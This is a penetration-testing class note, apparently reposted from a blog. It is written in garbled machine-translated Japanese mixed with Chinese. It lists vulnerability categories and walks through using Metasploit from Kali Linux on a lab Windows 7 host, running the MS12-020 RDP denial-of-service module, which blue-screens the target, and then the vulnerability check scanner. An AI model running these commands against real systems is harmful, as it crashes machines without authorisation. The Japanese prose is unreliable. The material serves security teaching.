「ネットワークセキュリティおよび侵入テスト」クラスのノート--- 04

2019年4月16日- -
オペレーティングシステム上の脆弱性を
主にMetasploitの中で攻撃する既知の脆弱性のためのWindows7のシステムでは、カーリーLinuxのツールを利用します。
Metasploitの攻撃の詳細な説明は、Metasploitの知識の欠陥の定義、導入および使用を含む
第一に、脆弱性は何ですか?

漏洞(hole)是在硬件、软件、协议的具体实现或系统安全策略上存在的缺陷,
				从而可以使攻击者能够在未授权的情况下访问或破坏系统。

脆弱性カテゴリー:

HTTP 参数污染
后门
Cookie 验证错误
跨站请求伪造
ShellCode
SQL 注入
任意文件下载
任意文件创建
任意文件删除
任意文件读取
其他类型
变量覆盖
命令执行
嵌入恶意代码
弱密码
拒绝服务
数据库发现
文件上传
远程文件包含
本地溢出
权限提升
信息泄漏
登录绕过
目录穿越
解析错误
越权访问
跨站脚本
路径泄漏
代码执行
远程密码修改
远程溢出
目录遍历
空字节注入
中间人攻击
格式化字符串
缓冲区溢出
HTTP 请求拆分
CRLF 注入
XML 注入
本地文件包含
证书预测
HTTP 响应拆分
SSI 注入
内存溢出
整数溢出
HTTP 响应伪造
HTTP 请求伪造
内容欺骗
XQuery 注入
缓存区过读
暴力破解
LDAP 注入
安全模式绕过
备份文件发现
XPath 注入
URL 重定向
代码泄漏
释放后重用
DNS 劫持
错误的输入验证
通用跨站脚本
服务器端请求伪造
跨域漏洞
错误的证书验证

Metasploitのの第二に、導入および使用

主要是利用已知的漏洞对目标系统加以利用

ツール場所:

在应用程序  ---> 08-漏洞利用工具集-->metasploit

ここに画像を挿入説明
三、Metasploitの詳細な攻撃の
準備をするための環境:
カーリーのlinux
のWindows7
それらが同じネットワークセグメントにある
以下の機能を備えたWindows7の:
1、エネルギーとカーリーのLinuxのping(ファイアウォールののWindows7をオフにしてください)を通じてここに画像を挿入説明
ここに画像を挿入説明
2、リモートデスクトップがオンになっているここに画像を挿入説明ここに画像を挿入説明
のWindows7をスキャンしますMS12-020の既知の脆弱性
ではカーリーのlinuxで

终端内输入:msfconsole

上記の方法で開くことができMetasploitのツールを開き

ここに画像を挿入説明

输入下列命令

search ms12-020		#注释:扫描之后发现存在两个问题,分别是DOS攻击和远程桌面攻击
use  auxiliary/dos/windows/rdp/ms12_020_maxchanne	#注释:先使用第一个漏洞,DOS攻击
show options		显示选项
set rhosts 192.168.247.20	#注释:修改参数,加入目标windows7的ip地址
show options		#注释:再看一下有啥不同之处
run					#注释:运行这个模块

ここに画像を挿入説明
ここに画像を挿入説明Windows7を見て、私は、攻撃が成功したことを示す、ブルースクリーンを発見しました。
ここに画像を挿入説明
[リモートデスクトップと抜け穴があるかどうかをテスト
コマンドを入力しますが、

msfconsole		#注释:打开Metasploit
search ms12-020		#注释:扫描ms12-020
use  auxiliary/scanner/rdp/ms12_020_check	#注释:使用这个漏洞
show options		显示选项
set rhosts 192.168.247.20	#注释:修改参数,加入目标windows7的ip地址
show options		#注释:再看一下有啥不同之处
run					#注释:运行这个模块

ここに画像を挿入説明
出現ターゲットが脆弱(脆弱ターゲット)がある。リモートデスクトップの言葉はそれは、リモートでコードが実行される可能性が存在するものとします。

OK、その後、付録では、ポートの詳細が提供ここに画像を挿入説明コメント、ご質問がある(*¯)¯)

おすすめ

転載: blog.csdn.net/zhaotiannuo_1998/article/details/89338269